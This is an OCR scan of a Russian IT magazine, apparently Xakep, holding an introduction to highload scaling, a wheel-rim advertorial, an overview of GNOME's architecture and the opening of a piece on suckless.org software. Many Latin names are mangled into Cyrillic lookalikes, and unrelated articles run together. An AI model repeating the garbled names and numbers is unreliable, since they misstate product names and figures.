опенсорсные средства нужно прикрутить, а что написать самим, 
чтобы все заработало прямо завтра. В больших корпорациях, 
скорее всего, есть нетолько гуру, которые сидят и «пилят» Ьід сіа^а 
иѵѵеЬзсаІе, ной огромное количество специалистов, которые 
занимаются инновациями именно в области изаЬіІі^у, новых серви- 
сов и прочего. 

Далее мы будем говорить в основном о сервисной архитек- 
туре и об инструментах, которые можно применять в масштаби- 
ровании. 

МАСШТАБИРОВАНИЕ АРХИТЕКТУРНОГО РЕШЕНИЯ 

Для начала рассмотрим самые основы — вертикальное и горизон- 
тальное масштабирование. В чем состоитконцепция вертикаль- 
ного масштабирования? 

Вертикальное масштабирование заключается в увеличен и и 
производительности системы за счетувеличения мощности 
сервера. Посути, при вертикальном масштабировании задача 
увеличения производительности отдается на аутсорс произво- 
дителямжелеза. Специалисты, которые делаютбольшую железку, 
предлагают некое обобщенное решение, которое будет работать 
быстрее. Вы заменили машину — и у вас стало работать быстрее. 

Какие здесь есть опасности? Один из главных недостатков — 
вертикальное масштабирование ограничено определенным 
пределом. Параметры железа нельзя увеличивать бесконечно. 

В какой-то момент ста нет нужна уже тысяча серверов. Закупить 
столько железа будет л ибо невозможно, либо нецелесообразно. 
Кроме того, стоимость машин с более высокими характеристика- 
ми не обязательно возрастает линейно. Следующая по мощности 
машина может стоить уже даже не в два раза дороже, чем предыду- 
щая. Поэтому вертикальное масштабирование требует крайне 
аккуратного планирования. 



Вертикальное масштабирование 




Увеличение 
прсизвсщтепыіости 
систры аа очет 
увеличения 
мощности серверэ- 

В каной-то момент 
мы все равно 
достигнем лредепа 
по процессору, 
памяти или 
жесткому диску. 



АЛЬТЕРНАТИВНЫЙ 
ПОДХОД — ГОРИЗОНТАЛЬНОЕ 
МАСШТАБИРОВАНИЕ 

Основной его принцип — мы 
подключаемдополнительныесер- 
веры,хранилищаиучимнашупро- 
граммную систему использовать 
их все. Именно горизонтальное 
масштабирование является сейчас 
фактически стандартом. 

Однако на самом деле верти- 
кальная компонента присутствует 
практически всегда, а универсаль- 
ного горизонтального масштабиро- 
вания кактакового не существует. 
Известентакжетакойтермин, как 
диагональное масштабирование. 
Оно подразумевает одновременное 
использование двух подходов, то 
есть вы сразу и покупаете новое же- 
лезо, тем самым выигрывая время. 



и активно переписываете приложе- 
ния. Например, такой подходпринят 
вЗ^аскОѵегЛоѵѵ. 

И еще один способ масштаби- 
рования. Каквообщевыполняется 
любое масштабирование, как про- 
ектируются высоконагруженные 
системы? Первое, что необходимо 
сделать, — это изучить предмет- 
ную область, какданные движутся 
внутри системы, какони обрабатыва- 
ются, откуда и куда текут. Интернет- 
проект — это в каком-то роде система 
для различного представления раз- 
ных да иных с разными свойствами. 

При этом некоторые данные 
всегда должны бытьактуальными, 
а на другие можно«забить» и по- 
казывать их обновление не сразу. 
Приведем простейший пример. 
Пользователь, который постит 



Горизонтальное масштабирование 




Увеличение 

іроизасщитольности 

С№;Т18МЫ счет 

подключения 

дополнительных 

сзреѳрсѳ 
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сообщение в свой блог, должен тут же увидеть это сообщение, 
иначе он подумает, что что-то сломалось. А во френд-ленте друзей 
пользователя это сообщение может появиться и через минуту. 

Зная такие особенности, можно применять прекрасный 
метод, который называют отложенной обработкой. Его сутьза- 
ключается в том, что данные обрабатываются в тот момент, когда 
это наиболее удобно. Например, пять-шесть лет назад, когда 
железо было не таким производительным, мы все запускали 
сгоп'ы по обработке статистики по ночам. В дальнейшем мы 
будем говорить в том числе и об инструментах, которые исполь- 
зуются для реализации масштабирования во времени, например 
об очередях. 

ТРЕХЗВЕННАЯ СТРУКТУРА 

Чтобы говорить на одном языке, приведем еще одно опреде- 
ление — определение та к называем ой трехзвенной структуры 
системы. Три звена — этофронтенд, бэкенд и хранение данных. 

Каждоезвено выполняетсвои функции, отвечаетза различ- 
ные стадии в обработке запросов и по-разному масштабируется. 
Первоначально запрос пользователя приходит на фронтенд. 
Фронтенды отвечают, как правило, за отдачу статических 
файлов, первичную обработку запроса и передачу его дальше 
(своему апстриму, бэкенду). Второе звено, куда приходит запрос 
(уже предварительно обработанный фронте ндом), — это бэкенд. 
Бэкенд занимается вычислениями — именно он отвечаетза то, 
чтобы вычислить, обработать, переработать, повернуть, пере- 
вернуть, перекрутить, смасштабировать и так далее. На стороне 
бэкенда, как правило, реализуется бизнес-логика проекта. 

Следующий слой, который вступаете дело обработки запро- 
са, — это хранение данных, которые обрабатываются бэкендом. 
Это можетбыть база данных, файловая система, да и вообще что 
угодно. В наших статьяхмы планируем подробно описать, как 
масштабируется каждое из этих звеньев. Начнем сфронтенда. Для 
чегоон нужен, мы расскажем в следующем номере. зс 



Масштабирование 
44ВО вренени>^ 

Различные данные имеют различные 
требования к обновлению. 

Это позволяет нам отложить часть 
обработки данных 
до более удобного случая. 



Трехзвениая 

структура 




НІ6НЮА0-ИНСТРУКТ0РЫ 



Олег Бунин 

Известный 
специалист 
по НідЫоасІ- 
проектам. 

Его компания 
«Лаборатория 
Олега Бунина» 
специализиру- 
ется на консалтинге, разработке и 
тестировании высоконагруженных 
веб- проектов. Сейчас является 
организатором конференции 
НіаІіЕоасІ++ (ѵѵѵѵѵѵ.ІііаЫоасІ.ги І. 

Это конференция, посвященная 
высоким нагрузкам, которая 
ежегодно собирает лучших в мире 
специалистов по разработке 
крупных проектов. Благодаря этой 
конференции знаком со всеми 
ведущими специалистами мира 
высоконагруженных систем. 



Константин Осипов 

Специалистпо 
базам данных, 
который долгое 
время работал 
в МуБОЕ, где от- 
вечал какразза 
высоконагружен- 
ный сектор. Бы- 
строта МуБОЕ — в большой степени 
заслуга именно Кости Осипова. В 
свое время он занимался масшта- 
бируемостью МуБОЕб.б. Сейчас 
отвечаете МаіЕРи за кластерную 
МоБОЕ базуданныхТагап^ооІ, ко- 
торая обслуживаетбОО-бООтысяч 
запросов в секунду. Использовать 
этотореп-зоигсе проектможет 
любой желающий. 



МаксимЛапшин 

Решения для 
организации 
видеотрансляции, 
которые существу- 
ютвмиренадан- 
ный момент, можно 
пересчитатьпо 
пальцам. Макс 
разработал одно из них — Егіуѵісіео 
(еНууЩеоющ). Это серверное прило- 
жение, котороезанимается потоко- 
вым видео. При создании подобных 
инструментов возникаетцелая куча 
сложнейших проблем со скоростью. 

У Максима также есть некоторый 
опыт, связанный с масштабировани- 
ем средних сайтов (не таких крупных, 
какМаіЕРи). Под средними мы под- 
разумеваем такие сайты, количество 
обращений ккоторым достигает 
около 60 миллионов в сутки. 



Константин Машуков 

Бизнес-аналитик 
в компании Олега 
Бунина. Констан- 
тин пришел из 
мира суперком- 
пьютеров, где 
долгое время «пи- 
лил» различные 
научные приложения, связанные 
с числодробилками. В качестве 
бизнес-аналитика участвует во 
всех консалтинговых проектах 
компании, будь то социальные сети, 
крупные интернет-магазины или 
системы электронных платежей. 
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эти ТРИ БУКВЫ СТАЛИ СИМВОЛОМ ОСОБОГО СТИЛЯ и ВЫСОЧАЙШЕГО 
КАЧЕСТВА ДЛЯ АВТОМОБИЛБНЫХ ЭНТУЗИАСТОВ СЕВЕРНОЙ АМЕРИКИ. 
СЕГОДНЯ МЫ ПОСТАРАЕМСЯ ПРИОТКРЫТЬ ЗАВЕСУ ТАЙНЫ И ПОНЯТЬ 
В ЧЕМ ЖЕ УСПЕХ ЭТИХ КОЛЕСНЫХ ДИСКОВ. 



Во-первых, это серьезный контроль качества 
выпускаемой продукции. Каждый диск проходит 
несколько уровней проверки по различным пара- 
метрам. Новейшее технологическое оборудование 
на заводах Т5ѴѴ дает гарантию того, что ни один 
дефект не останется незамеченным. Дело в том, 
что к производственному процессу здесь относятся 
также трепетно, как и к последуюідей стадии про- 
верки изделий. Все это внимание и забота доходят 
до счастливого покупателя с каждым колесным 
диском Т5ѴѴ. 

Во-вторых, это компания, которая думает не 
только о технической составляюідей, но и эмоцио- 
нальной. А потому каждый год на рынке появля- 



ются сразу несколько моделей первоклассных 
колесных дисков Т5ѴѴ. Наряду с универсальными 
дисками, которые подходят на любой автомобиль 
иностранного производства (при условии правиль- 
но подобранных посадочных размеров), компания 
выпускает специальные линейки для опреде- 
ленных марок автомобилей. Тем самым усилия 
дизайнеров направлены не на беспорядочную 
толпу жаждуідих хлеба и зрелиш, (как известно, 
всем сразу не угодишь), а на вполне определенных 
клиентов с конкретными запросами и пожела- 
ниями. Отсюда безмерная благодарность тех, кто 
уже сделал свой выбор в пользу Т5ѴѴ, и растуідий 
интерес новой аудитории. 
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АРХИТЕКТУРА 
СМОМЕ: ОТ СТК+ 

ДО 5НЕИ 

Многие из нас привыкли видеть на сво- 
ем столе 6М0МЕ — простую и интуи- 
тивно понятную среду, которую можно 
изменять, расширять и всячески под- 
гонять под свой вкус. Однако далеко 
не все знают, как выглядит 6М0МЕ из- 
нутри, что заставляет работать все его 
шестеренки слаженно и как обычный 
код на языке Си превращается в стиль- 
ную высококачественную картинку. 
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ТОРЖЕСТВО 

КОНВЕРГЕНЦИИ 



ВВЕДЕНИЕ 



СМОМЕ родился в 1997 году как ответ на по- 
явление среды КОЕ, базировавшейся на тогда 
еще проприетарной технологии ОЕ За несколь- 
ко лет развития он превратился из небольшо- 
го и не представляющего особого интереса 
графического рабочего стола в полноценное 
окружение, способное на равных конкуриро- 
вать с КОЕ, и даже когда в 2000 году 01 стал от- 
крытым ПО, СМОМЕ продолжил свое развитие 
и наращивание функционала. 

Совсем скоро эта среда начала доминиро- 
вать на рабочих столах пользователей и сегод- 
ня фактически является стандартом для Ыпих- 
десктопа. СМОМЕ по умолчанию используется 
в таких дистрибутивах, как СІЬипІи, Ребога, 
ОрепССІСЕ, и многих других. Даже несмотря 
на то, что версия 3.0, радикально изменившая 
былой облик рабочей среды, многим не при- 
шлась по вкусу, СМОМЕ не теряет привержен- 
ность пользователей, которые придают ему 
более классический вид с помощью различных 
форков и настроек. 

Как же выглядит самая популярная гра- 
фическая среда иМІХ изнутри? Попробуем 
разобраться. 



БАЗОВАЯ АРХИТЕКТУРА 



Развитие СМОМЕ всегда происходило эволю- 
ционным путем. Заложенные еще в самом на- 
чале проекта идеи до сих пор остаются базой 
для всех остальных компонентов, меняясь 
лишь качественно. СМОМЕ сменил уже три 
версии СТК в качестве графического тулкита; 
идея межпроцессного взаимодействия, изна- 
чально реализованная на основе СОРВА, была 
заменена на более легковесный 0-Виз; сме- 
нилось несколько поколений мультимедийных 
фреймворков; были добавлены многие другие 
технологии, которые теперь являются частью 
СМОМЕЗ. 

Одной из отличительных черт проекта 
СМОМЕ всегда была идея заимствования 
кода из других проектов. Это может по- 
казаться странным, особенно в сравнении 
с КОЕ, но большая часть компонентов СМОМЕ 
написана вовсе не разработчиками самой 
среды, а командами, не имеющими с про- 
ектом ничего общего. Так, в СМОМЕ исполь- 
зуется графический тулкит СТК, изначально 
созданный для проекта Сітр, в качестве 
менеджера окон до недавнего времени 
был задействован Меіасііу, в качестве 



мульти медиа -фреймворка используется 
ССігеатег, который, в свою очередь, опи- 
рается на библиотеку І'і'ппред. Рігеі'ох уже 
давно считается стандартным браузером 
среды наравне с ЕрірЬапу. 

Фактически изначальная версия СМОМЕ 
представляла собой всего лишь несколько 
приложений, способных объединить уже 
существующие технологии для создания 
полноценной графической среды. Среди 
таких приложений были строка состояния, 
файловый менеджер, конфигуратор и не- 
большая библиотека ІіЬдпоте с реали- 
зацией часто используемых функций. 

Со временем количество собственных 
разработок в проекте возросло, но общая 
идея среды, построенной с использовани- 
ем существующих компонентов, осталась 
неизменной. 

Сами создатели СМОМЕ условно делят 
свое детище на несколько подуровней, 
в каждом из которых используются те или 
иные наработки сообщества. Мы детально 
рассмотрим эти уровни и разберемся, как 
разработчикам удается совместить воедино 
такое разнообразие технологий. 
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Торжество конвергенции 



ЯДРО 



Архитектурно СМОМЕ представляет собой 
набор библиотек и различных механизмов, 
которые позволяют создавать сложные гра- 
фические приложения, способные взаимодей- 
ствовать с другими компонентами среды. На 
самом низком уровне этого каркаса находится 
несколько базовых библиотек и фреймворков, 
среди которых СЫЬ, С0Ь]есТ ІіЬдпоте, 0-Виз 
и 6ѴР5. Это фундамент 6М0МЕ, на котором 
основаны все остальные компоненты среды. 

Центральной частью этого фундамента 
является библиотека бЫЬ, расширяющая 
базовые возможности библиотеки ІіЬс. бЫЬ 
предоставляет множество подсобных функций, 
необходимых для разработки многих типов 
приложений. Среди реализованной в библио- 
теке функциональности можно отметить боль- 
шой набор различных типов данных, механизм 
отладочных сообщений, функции для работы 
со строками, средства работы с динамической 
памятью, атомарные потоки и средства син- 
хронизации, генератор псевдослучайных чи- 
сел, синтаксический анализатор .іпі-подобных 
конфигурационных файлов и многое другое. 

Изначально СЫЬ была разработана при 
создании библиотеки 6ТК+, но вскоре стала 
самостоятельной библиотекой, возможности 
которой используются многими графическими 
и консольными приложениями. Например, 
бЫЬ активно используется файловым менед- 
жером МС. 

На бЫЬ также основана еще одна корневая 
библиотека проекта 6М0МЕ — 60Ь]есЕ Она 
предоставляет объектную систему (каркас), 
используемую большинством других компо- 
нентов ОМОНЕ, а также библиотекой 6ТК+. 
60Ь)ес1 позволяет применить принципы разра- 
ботки ООП к любому поддерживаемому языку 
программирования (в первую очередь Си), 
позволяя создавать, копировать, уничтожать 
объекты и выполнять другие операции. 

Чуть выше ОЫЬ и 60Ь)ес1 находится 
библиотека ІіЬдпоте, реализующая ряд 
высокоуровневых возможностей, которые 
пригодятся при создании графических при- 
ложений и для связи между компонентами 
графической среды. Библиотека включает 
в себя еще более полный набор СЫЬ-подобных 
функций, инструменты интернационализа- 
ции, хранения конфигурации, запуска новых 
приложений и так далее. В настоящее время 
библиотека объявлена устаревшей, а весь ее 
функционал постепенно переносится в СЫЬ 
и другие библиотеки и инструменты, исполь- 
зуемые в среде 0МОМЕ. 

Для взаимодействия приложений с други- 
ми элементами среды 6М0МЕ используется 
шина О-Виз, реализующая механизм передачи 
сообщений между различными приложения- 
ми. О-Виз был создан независимой командой 
разработчиков в качестве универсального 
средства взаимодействия для любых воз- 
можных приложений и теперь является частью 
І^геесіезкіор.огд и стандартом передачи сооб- 
щений в иМІХ. Шина 0-Виз заменила не только 
громоздкий и медлительный РСР СОРВА, 



который использовался в 6М0МЕ изначально, 
но и механизм ОСОР, используемый в КОЕ 3. 
Также 0-Виз сегодня применяется во многих 
системных компонентах Ыпих-дистрибутивов, 
например исіеѵ, для передачи сообщений 
о подключении нового оборудования. 

Поверх 0-Виз в 6М0МЕ реализован демон 
6ѴР5, предоставляющий средства для под- 
ключения различных виртуальных файловых 
систем, реализованных с помощью Р05Е. 
Демон 6ѴР5 дополнен библиотекой, реализую- 
щей АРІ 610 для асинхронного неблокируемого 
чтения и записи файлов и других потоков дан- 
ных. Благодаря 6ѴР5 и 610 сторонние разра- 
ботчики могут легко реализовать в своих при- 
ложениях такую функциональность, как чтение 
удаленных РТР-архивов или 5МВ-дисков. До 
внедрения 6ѴР5 в 6М0МЕ использовалась 
аналогичная система бпотеѴРб, недостаток 
которой состоял в том, что виртуальная ФС не 
была видна внешним приложениям без под- 
держки бпотеѴРб. 



ГРАФИЧЕСКИЙ ИНТЕРФЕЙС 



Поверх фундамента в 6М0МЕ реализован 
графический интерфейс, центральной частью 
которого является тулкит 6ТК+, библиотеки 
Рапдо, Саіго, а также набор смежных библио- 
тек, таких как АТК, СІииег и ѴѴеЬКіЕ 

Библиотека 6ТК+, изначально созданная 
для реализации интерфейса графического 
редактора 6ІМР, используется в бМОМЕдля 
формирования пользовательского интерфейса 
приложений. По своей сути 6ТК+ представляет 
собой набор графических элементов управ- 
ления (виджетов): кнопки, чекбоксы, списки, 
окна ввода и так далее, с помощью которых 
строится внешний облик приложений. 

Начиная с версии 2.8, 6ТК+ использует для 
отрисовки интерфейса библиотеку векторной 
графики Саіго, которая позволяет переложить 
множество действий на графический про- 
цессор. Саіго способна работать как поверх 
X ѴѴіпбоѵѵ, так и поверх графической подси- 



стемы МісгозоЙ ѴѴіпбоѵѵз, Ве05, 05/2, Еіпих 
РгатеЬиИег и множества других средств 
вывода изображений, включая вывод в РМ6, 
РОРиЗѴб. 

Для вывода текста 6ТК+ использует возмож- 
ности библиотеки Рапдо, предназначенной для 
отображения текста на разных языках. Рапдо 
способна работать с различными типами шриф- 
тов и отображать текст практически на всех 
известных языках, используя разные стили, 
цвета и способы написания (справа налево, 
например). В свое время Рапдо была разрабо- 
тана специально для 6ТК+; самыми известными 
приложениями, использующими ее, являются 
РігеЬх и компоненты проекта 6М0МЕ. 

Совместно с 6ТК+ любой разработчик мо- 
жет задействовать ресурсы тулкита АТК, чтобы 
наделить свои приложения функциями для 
людей с ограниченными возможностями. Сюда 
можно отнести увеличенные элементы управ- 
ления для слабовидящих пользователей или 
специальный клавиатурный режим (например, 
«липкие» клавиши) для людей с нарушениями 
опорно-двигательной системы. 

Для формирования различных элементов 
рабочего стола, не связанных с интерфейсом 
самих приложений, задействованы возможно- 
сти графической библиотеки СІииег. На СІииег 
полностью основан графический интерфейс 
6М0МЕ 5Ье11, также ее возможности частично 
используются в других приложениях. Главная 
особенность этой библиотеки заключается 
в использовании подходов к разработке игр 
для написания графических интерфейсов. Би- 
блиотека почти полностью основана на ОрепбЕ 
и предлагает богатые возможности для анима- 
ции и создания визуальных эффектов, требуя 
минимального написания кода. Изначально 
СІииег была разработана компанией Іпіеі для 
использования в ОС МоЫіп (позднее Меебо 
и ТІ 2 еп), но теперь разрабатывается независи- 
мой командой программистов. 

Немаловажное место среди инструментов 
формирования интерфейса в 6М0МЕ занимает 
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ѴѴеЬКі10ТК+ — движок ѴѴеЬКіІ, интегрирован- 
ный в 6ТК+. Он может быть использован для 
встраивания веб-страниц в другие приложе- 
ния, например браузер ЕрірЬапу, почтовый 
клиент Еѵоіиііоп или интерфейс ОМОНЕ ОЬеІІ. 

Сам ОМОНЕ ОЬеІІ, используемый по умол- 
чанию в ОМОНЕ 3, полностью реализован на 
языке ЗаѵаОсгірІ с использованием движка 
0]5, основанного на ОрісІегНопкеу и 00Ь]'есЕ 



МУЛЬТИМЕДИА 



Немаловажное место в ОМОНЕ занимает 
мультимедийная подсистема, которая также 
основана на сторонних наработках. В ее осно- 
ве лежаттри компонента: РиІзеАисІіо, СапЬегга 
и ООігеатег. 

Звуковой сервер РиІзеАисІіо выполняет за- 
дачи интеллектуального управления звуковы- 
ми потоками, такие как установка различных 
уровней громкости для отдельных приложе- 
ний, смешивание аудиопотоков, проигрывание 
потока с предсказуемой задержкой, преоб- 
разование аудиоформатов, синхронизация по- 
токов воспроизведения, встроенный микшер. 
Кроме того, демон поддерживает систему 
плагинов, которая позволяет расширять набор 
доступных средств обработки звука новыми 
эффектами. До появления РиІзеАисІіо в 6М0МЕ 
применялся звуковой сервер Е50, созданный 
для графической среды ЕпІідЫептепЕ 

Поверх РиІзеАисІіо работает мультимедий- 
ный фреймворк бЗігеатег, выполняющий 
роль универсального всеядного комбай- 
на, способного проигрывать большинство 
форматов аудио- и видеоданных. СЗігеатег 
основан на системе плагинов, реализующих 
поддержкутех или иных форматов кон- 
тейнеров или методов сжатия данных. При 
обработке мультимедиаданных происходит 
их передача по цепочке плагинов, а вывод 
направляется в РиІзеАисІіо (АЕ5А, 055, по 
запросу), или в указанный буфер, или в окно 
X ѴѴіпбоѵѵ. Для приложений доступен АРІ, 
с помощью которого можно управлять вос- 
произведением и выполнять другие операции 
над данными. 

Для вывода различных уведомлений 
и звукового сопровождения работы среды ис- 
пользуется простая библиотека СапЬегга. 



КОММУНИКАЦИИ 



Для связи с внешним миром СМОМЕ ис- 
пользует стандартные средства операцион- 
ной системы, а также набор инструментов 
автоконфигурирования сети и осуществления 
обмена сообщениями в реальном времени 
(ІМ). Основные компоненты этого слоя: АѵаЬі, 
ОСІРпР, МеІѵѵогкМападег и ТеІераіЬу. 

В основе сетевой подсистемы ОМОНЕ 
лежит МеІѵѵогкМападег, автоматический кон- 
фигуратор сетевых интерфейсов, который ра- 
ботает как с обычными ЕіЬегпеІ-адаптерами, 
так и с ѴѴі-Рі-картами, а также различными 
модемами и ВІиеІооіЬ-устройствами. Благо- 
даря модульному дизайну МеІѵѵогкМападег 
позволяет подключаться к практически любым 
типам сетей, задействуя такие технологии, как 
ОНСР для полностью автоматической настрой- 
ки ІР- и 0М5-адресов. Демон МеІѵѵогкМападег 
стартует еще на этапе запуска сервисов, 
поэтому к моменту загрузки среды 6М0МЕ 
сеть уже оказывается полностью настроенной 
и готовой к работе. 

Для еще более интеллектуальной настрой- 
ки сети 6М0МЕ использует демон АѵаЬі, пред- 
ставляющий собой свободную реализацию 
2егосопб то есть технологию автоматического 
создания ІР-сети и обнаружения сервисов без 
участия человека. АѵаЬі берет на себя такие 
задачи, как автоматическое присвоение маши- 
не ІР-адреса из диапазона 169.254.* (в случае 
если в сети нет ОНСР-сервера), назначение 



доменного имени в зоне .ІосаІ и протокола 
ІІРпР, реализованного с помощью библиотеки 
бІІРпР. АѵаЬі позволяет пользователю сразу 
после установки/загрузки ОС получить доступ 
к любым службам, доступным в сети, включая 
сетевое оборудование. 

Уровнем выше находится фреймворк 
ТеІераіЬу, предоставляющий приложениям 
средства обмена данными в режиме реального 
времени. Пока ТеІераіЬу используется в основ- 
ном для обмена мгновенными сообщениями 
в таких программах, как ЕтраіЬу, однако его 
возможности намного шире, и в долгосрочной 
перспективе этот фреймворк можно приспосо- 
бить для обмена практически любыми типами 
данных, включая голосовой и видеочат, обмен 
файлами, совместное редактирование доку- 
ментов, просмотр удаленного рабочего стола. 
Некоторые приложения уже начинают ис- 
пользовать эти возможности, например 5ис1оки 
и Теігіз для многопользовательской игры, 
АЬіѴѴогб (с плагином АЬіСоІІаЬ) для совместно- 
го редактирования. ТеІераіЬу имеет модульный 
дизайн с реализацией многих популярных 
протоколов обмена сообщениями. 



ХРАНЕНИЕ ИНФОРМАЦИИ 



Чтобы приложения не «городили сущностей», 
а разработчики не трудились над созданием 
собственного механизма хранения данных, 
0МОМЕ реализует несколько механизмов 
эффективного хранения информации на диске. 



^Узег Іпіегіасе 

6ТК+ Саіго СІииег 

АТК Рапдо ѴѴеЬкіІ 



ч У 
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Среди этих механизмов можно отметить Е05, 
СОА, Тгаскег, 6М0МЕ Кеугіпд. Е05 (Еѵоіиііоп 
Оаіа Сегѵег) используется для централизован- 
ного хранения книги контактов и календаря, 
доступ к которым может получить любое при- 
ложение, имеющее соответствующие права. 
Благодаря хранению этой информации в еди- 
ном месте среда существенно облегчает жизнь 
пользователя, снимая с него задачу дублиро- 
вания информации в различных приложениях. 
Например, ЕтраіЬу автоматически добавит 
в ростер всех пользователей из адресной 
книги ЕтраіЬу, имеющих какие-либо аккаунты 
в ІМ-сервисах. Календарь, доступный по на- 
жатию на часы в строке состояния, автома- 
тически покажет все важные даты, до этого 
добавленные в планировщик. Библиотека СОА 
(6М0МЕ Оаіа Ассезз) реализует обертку вокруг 
реляционных баз данных, которую приложения 
могут использовать для унифицированного 
доступа к различным базам данных. 

Тгаскег реализует в 6М0МЕ функциональ- 
ность локального поисковика. Архитектурно он 
сильно напоминает аналогичную подсистему 
К0Е4 и также реализует стандартизованный 
АРІ Меротик, однако имеет иную, более мед- 
лительную реализацию с меньшими запросами 
оперативной памяти. Тгаскег — это семанти- 
ческий поисковик, который учитывает смысл 
поисковых запросов, а не просто его ключевые 
слова. Такой подход позволяет искать данные 
намного более эффективно, возвращая в ответ 
документы, которые могут не содержать ни 
одного заданного ключевого слова, но под- 
ходить по смыслу к поисковому запросу. 

Еще одна система хранения данных, 
используемая в 6М0МЕ, — это библиотека 
6М0МЕ Кеугіпд, отвечающая за хранение 
паролей. Принцип ее работы аналогичен 
многим другим похожим приложениям, таким 
как, например, КееРаззХ — сборник паролей, 
зашифрованный с использованием другого 
пароля. Разница только в том, что в качестве 
мастер-пароля в СМОМЕ Кеугіпд (обычно) 
используется пароль пользователя, а каждая 
запись имеет привязку к приложению, благо- 
даря чему приложение может просто запро- 
сить пароль напрямую у Кеугіпд, не принуждая 
пользователя самостоятельно копировать его 
в диалоговое окно. 



ИНТЕГРАЦИЯ с СИСТЕМОЙ 



Одну из ключевых ролей в ОМОНЕ играет на- 
бор механизмов, обеспечивающих связь среды 
с железом. Основное значение здесь имеют 
три демона: ОРоѵѵег, ІЮізкз и РоІісуКіЕ 

ОРоѵѵег представляет собой обертку вокруг 
файловой системы зузі^з, позволяющую при- 
ложениям получать статистику потребления 
энергии различными компонентами системы 
посредством шины 0-Виз, а также инфор- 
мацию об изменении состояния источников 
питания (переход на питание от сети, инфор- 
мация о заряде аккумулятора и так далее). 

Все эти данные позволяют 6М0МЕ адекватно 
реагировать на события, связанные с пита- 
нием, своевременно активировать функции 



энергосбережения, уведомлять пользователя 
о разряде батареи и корректно выключать 
и перезагружать машину. Демон ООізкз предо- 
ставляет аналогичную функциональность, 
связанную с накопителями. Каждый раз, когда 
в системе появляется новый накопитель, 
ІЮізкз уведомляет об этом всех своих «под- 
писчиков», сообщая им полную информацию 
обустройстве. Эта информация позволяет 
реализовать функции автомонтирования 
и безопасного отключения устройств. Когда-то 
ІІРоѵѵег и ІЮізкз были частью проекта МАЕ, но 
после появления исіеѵ необходимость в МАЕ 
пропала и его функциональность была пере- 
несена в два разных демона, развиваемых 
в рамках проекта І^геесіезкіор.огд. 

Чтобы регулировать, какие приложения 
могут получить доступ к функциональности 
ЕІРоѵѵег и ЕЮізкз, а также другим привилегиро- 




• Разработка 
ОМОМЕ ведется, 
беспрекословно 
следуя принципам 
НІ6 (ІНитап Іпіег- 
Тасе Сиісіеііпез), 
по которым 
разрабатывается 
Мас05ХиК0Е4. 



• Проект 6М0МЕ 
был начат в августе 
1997 года Мигелем 
де Икасой как 
ответ на появление 
среды КОЕ, которая 
базировалась на 
проприетарной 
библиотеке ОТ. 



* Для координации 
работы над проектом 
и поощрения 
разработчиков 
в 2000 году 
была создана 
некоммерческая 
6М0МЕ Роипсіаііоп. 



* В последние годы 
при разработке 
компонентов 
СМОМЕвсе больше 
используется 
языке#, открытая 
реализация 
которого также 
создана Мигелем де 
Икасой. 

* Первая 

стабильная версия 
6М0МЕ увидела свет 
в марте 1999 года. 



• В 2005 году 
ЛинусТорвальдс 
назвал 6М0МЕ 
«окружением для 
идиотов». 



• Чтобы привести 
неугодный многим 
интерфейс 6М0МЕЗ 
к классическому 
ВИДУ6МОМЕ2, 
разработчики 
□пихМіпІ создали 
форкСМОМЕЗ под 
названием Сіппатоп 
( сіппатоп.ІіпихтіпЦ 
сот ). 



ванным функциям, СМОМЕ использует другую 
разработку ^геебезкіор.огд под названием 
РоІісуКіІ (роікіі). В его задачи входит филь- 
трация сообщений 0-Виз на основе заранее 
определенных правил и регулирование до- 
ступа к этим сообщениям со стороны других 
приложений. 



выводы 



Как и сам Еіпих, СМОМЕ — это конструктор, 
собранный из десятков элементов, сделанных 
сотнями независимых разработчиков. Благо- 
даря универсальным стандартам и инстру- 
ментам, созданным в рамках І^геесіезкіор.огд, 
все эти элементы удается объединить вместе, 
получив полноценную рабочую среду, которая 
правильно функционирует и не нуждается 
в какой-либо настройке и доводке до пригод- 
ного к использованию состояния. 
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Евгений Зобнин (ехесЬіі.ги) 



гениальное 

просто 



ПЕРЕХОДИМ 
НА СОФТ 
ОТ ПРОЕКТА 
5иСКІЕ55.0КС 

В современном мире тяжелых 
Ыпих-дистрибутивов, вы- 
сокоуровневых скриптовых 
языков и громоздких окру- 
жений рабочего стола, для 
работы которых требуются 
гигабайты оперативки, найти 
простые, надежные и удобные 
в использовании инструменты 
не так-то просто. Сообщество 
разработчиков зискіезз.огд 
остается одним из немного- 
численных бастионов, веду- 
щих непримиримую борьбу со 
сложным, раздутым и полным 
ошибок ПО. 



ВВЕДЕНИЕ 



Современный СІМІХушел очень далеко от 
принципов разработки простых и функциональ- 
ных приложений, которые всего лишь делают 
свою работу. Сегодня среднестатистический 
дистрибутив требует 2 Гб оперативной памяти 
и 8 Гб пространства на жестком диске, предла- 
гая пользователю тяжелую, красивую и функ- 
циональную среду, которая подойдет всем, 
включая твоих бабушку и дедушку. Это хорошо, 
но ровно до тех пор, пока за комп не сядет на- 
стоящий гик, для которого такие понятия, как 
НІ0 и «гісЬ изег іпіег^асе», не имеют никакого 
значения, а важны лишь скорость и качество 
исполнения работы. Гики чаще всего работают 
с командной строкой; она не слишком измени- 
лась со времен первоначального СІМІХ и до сих 
пор предлагает большое количество простых 
инструментов, которые выполняюттолько то, 
что нужно. Совсем другое дело — графический 
интерфейс. С самого момента своего появления 
он сломал идею простоты и скорости работы, 
присущие СІМІХ. Во все времена графические 
приложения были слишком громоздкими и тре- 
бовали выполнения многочисленных действий 
для достижения нужного результата. Возможно 
ли воспользоваться преимуществами графи- 
ческой среды, при этом сохранив простоту, 
гибкость и удобство истинного СІМІХ? 



БУСКЕЕББ.ОРО 



Наверняка ты не раз слышал о таких про- 
ектах, как бѵѵт, бтепи и зигГ Это простые, 
лаконичные, но не в пример удобные и быстрые 
приложения, созданные разработчиками из 
сообщества зискіезз.огд . Длина исходного кода 
каждого из них не превышает 10 тысяч строк. 



а конфигурирование в большинстве случаев 
производится с помощью прямой правки легкого 
для чтения исходника. Несмотря на крошечный 
размер, многие из этих приложений обладают 
довольно внушительным функционалом и чрез- 
вычайно удобны в использовании. Например, 
менеджер окон бѵѵт (бупатіс ѵѵіпбоѵѵ тападег) 
может похвастаться сразу тремя режимами груп- 
пировки окон, поддержкой множества рабочих 
столов, двухмониторных конфигураций, меха- 
низмом тегов, строкой состояния, способной 
разместить в себе любую текстовую информа- 
цию. Многие приложения сообщества способны 
работать совместно, создавая более сложные 
типы интерфейсов и расширяя возможности 
графического окружения. Так, вместе с бѵѵт 
обычно используется система меню бтепи, 
работающая по принципу «динамического по- 
иска», когда пользователь вводит часть имени 
нужного пункта меню, а «система» предлагает 
